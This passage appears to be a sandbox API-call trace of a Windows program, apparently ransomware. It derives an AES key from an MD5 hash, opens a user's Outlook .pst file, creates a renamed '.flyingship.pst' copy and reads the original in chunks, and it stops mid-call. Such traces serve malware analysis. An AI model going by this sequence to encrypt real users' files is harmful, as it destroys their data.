lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0176.198] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0176.198] PeekMessageW (in: lpMsg=0x87eac4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eac4) returned 0 [0176.198] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0176.199] CryptAcquireContextA (in: phProv=0x87ea98, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x87ea98*=0x9c0b78) returned 1 [0176.200] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0176.200] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0176.200] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXTSET", cchLength=0x12 | out: lpsz="__CRYPT_CONTEXTSET") returned 0x12 [0176.200] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0176.200] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0176.200] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0176.200] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0176.200] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0176.200] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0176.200] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0176.200] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0176.200] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0176.200] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0176.200] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0176.200] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0176.200] CharUpperBuffW (in: lpsz="_CRYPT_DERIVEKEY", cchLength=0x10 | out: lpsz="_CRYPT_DERIVEKEY") returned 0x10 [0176.200] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0176.201] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0176.201] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0176.201] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0176.201] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0176.201] PeekMessageW (in: lpMsg=0x87e7c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7c4) returned 0 [0176.201] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0176.201] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0176.201] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0176.201] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0176.201] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0176.201] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0176.201] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0176.201] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0176.201] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0176.201] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0176.201] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0176.201] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0176.201] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0176.201] CryptCreateHash (in: hProv=0x9c0b78, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x87e808 | out: phHash=0x87e808) returned 1 [0176.201] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0176.202] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0176.202] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0176.202] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0176.202] CharLowerBuffW (in: lpsz="byte[25]", cchLength=0x8 | out: lpsz="byte[25]") returned 0x8 [0176.202] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0176.202] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0176.202] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0176.202] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0176.202] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0176.202] CryptHashData (hHash=0x90ae18, pbData=0x8dedf8, dwDataLen=0x19, dwFlags=0x1) returned 1 [0176.202] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0176.202] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0176.202] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0176.202] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0176.202] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0176.202] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0176.202] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0176.202] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0176.203] CryptDeriveKey (in: hProv=0x9c0b78, Algid=0x660e, hBaseData=0x90ae18, dwFlags=0x1, phKey=0x87e808 | out: phKey=0x87e808*=0x90af98) returned 1 [0176.203] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0176.203] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0176.203] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0176.203] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0176.203] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0176.203] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0176.203] PeekMessageW (in: lpMsg=0x87e944, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e944) returned 0 [0176.203] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0176.203] CryptDestroyHash (hHash=0x90ae18) returned 1 [0176.203] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0176.203] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0176.203] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0176.203] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0176.203] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0176.204] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Outlook Files\\voeimd@djhreuu.uhd.pst" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\outlook files\\voeimd@djhreuu.uhd.pst"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0176.205] SetFilePointerEx (in: hFile=0x120, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0176.205] SetFilePointerEx (in: hFile=0x120, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87ef40 | out: lpNewFilePointer=0x0) returned 1 [0176.205] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8decb8 [0176.205] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3f0 [0176.205] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2788 [0176.205] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd810 | out: hHeap=0x8a0000) returned 1 [0176.205] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9f0 | out: hHeap=0x8a0000) returned 1 [0176.205] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd948 | out: hHeap=0x8a0000) returned 1 [0176.205] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dec90 | out: hHeap=0x8a0000) returned 1 [0176.205] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2628 | out: hHeap=0x8a0000) returned 1 [0176.205] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0176.205] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2628 [0176.205] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e8808 [0176.205] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2668 [0176.205] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e8808 | out: hHeap=0x8a0000) returned 1 [0176.205] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0176.205] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2628 | out: hHeap=0x8a0000) returned 1 [0176.205] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90ae18 [0176.206] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0176.206] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90ae18 | out: hHeap=0x8a0000) returned 1 [0176.206] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0176.206] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2628 [0176.206] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dec90 [0176.206] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd948 [0176.206] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2668 [0176.206] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9f0 [0176.206] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0176.206] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd810 [0176.206] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2668 [0176.206] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2828 [0176.206] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d480 [0176.206] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d480 | out: hHeap=0x8a0000) returned 1 [0176.206] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2828 | out: hHeap=0x8a0000) returned 1 [0176.206] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0176.206] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd600 [0176.206] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2668 [0176.206] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4b0 [0176.206] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2828 [0176.206] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd768 [0176.206] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2708 [0176.206] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba330 [0176.207] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26a8 [0176.207] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdae0 [0176.207] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2698 [0176.207] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd528 [0176.207] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2848 [0176.207] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdae0 | out: hHeap=0x8a0000) returned 1 [0176.207] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x50) returned 0x923a78 [0176.207] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2688 [0176.207] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xb0) returned 0x8e6cd8 [0176.207] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba330 | out: hHeap=0x8a0000) returned 1 [0176.207] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x70) returned 0x906f38 [0176.207] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4b0 | out: hHeap=0x8a0000) returned 1 [0176.207] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x70) returned 0x8fecd8 [0176.207] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e6cd8 | out: hHeap=0x8a0000) returned 1 [0176.207] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2688 | out: hHeap=0x8a0000) returned 1 [0176.207] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd528 | out: hHeap=0x8a0000) returned 1 [0176.207] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2848 | out: hHeap=0x8a0000) returned 1 [0176.207] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x923a78 | out: hHeap=0x8a0000) returned 1 [0176.207] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0176.207] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x906f38 | out: hHeap=0x8a0000) returned 1 [0176.207] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0176.207] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd768 | out: hHeap=0x8a0000) returned 1 [0176.208] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0176.208] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2708 [0176.208] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x70) returned 0x906f38 [0176.208] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Outlook Files\\" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\outlook files")) returned 0x10 [0176.208] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x906f38 | out: hHeap=0x8a0000) returned 1 [0176.208] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0176.208] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8fecd8 | out: hHeap=0x8a0000) returned 1 [0176.208] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2828 | out: hHeap=0x8a0000) returned 1 [0176.208] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd600 | out: hHeap=0x8a0000) returned 1 [0176.208] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0176.208] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90ae18 [0176.208] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10000) returned 0xa6f010 [0176.208] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd600 [0176.208] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2668 [0176.208] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Outlook Files\\voeimd@djhreuu.uhd.flyingship.pst" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\outlook files\\voeimd@djhreuu.uhd.flyingship.pst"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x138 [0176.209] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df000 [0176.209] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd768 [0176.209] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2828 [0176.209] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9f0 | out: hHeap=0x8a0000) returned 1 [0176.210] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd948 | out: hHeap=0x8a0000) returned 1 [0176.210] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd810 | out: hHeap=0x8a0000) returned 1 [0176.210] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dec90 | out: hHeap=0x8a0000) returned 1 [0176.210] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2628 | out: hHeap=0x8a0000) returned 1 [0176.210] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0176.210] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2628 [0176.210] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e8808 [0176.210] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2708 [0176.210] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e8808 | out: hHeap=0x8a0000) returned 1 [0176.210] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0176.210] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2628 | out: hHeap=0x8a0000) returned 1 [0176.210] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90af18 [0176.210] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0176.210] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90af18 | out: hHeap=0x8a0000) returned 1 [0176.210] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0176.210] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90af18 [0176.210] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0176.210] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2628 [0176.210] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dec90 [0176.210] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd810 [0176.210] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2708 [0176.210] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0176.211] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd948 [0176.211] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2708 [0176.211] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26a8 [0176.211] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d480 [0176.211] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d480 | out: hHeap=0x8a0000) returned 1 [0176.211] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0176.211] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0176.211] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9f0 [0176.211] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd528 [0176.211] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2708 [0176.211] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x100000) returned 0x2420020 [0176.211] SetFilePointerEx (in: hFile=0x120, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87ef90 | out: lpNewFilePointer=0x0) returned 1 [0176.211] ReadFile (in: hFile=0x120, lpBuffer=0xa5f008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87efb8, lpOverlapped=0x0 | out: lpBuffer=0xa5f008*, lpNumberOfBytesRead=0x87efb8*=0x10000, lpOverlapped=0x0) returned 1 [0176.217] ReadFile (in: hFile=0x120, lpBuffer=0xa5f008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87efb8, lpOverlapped=0x0 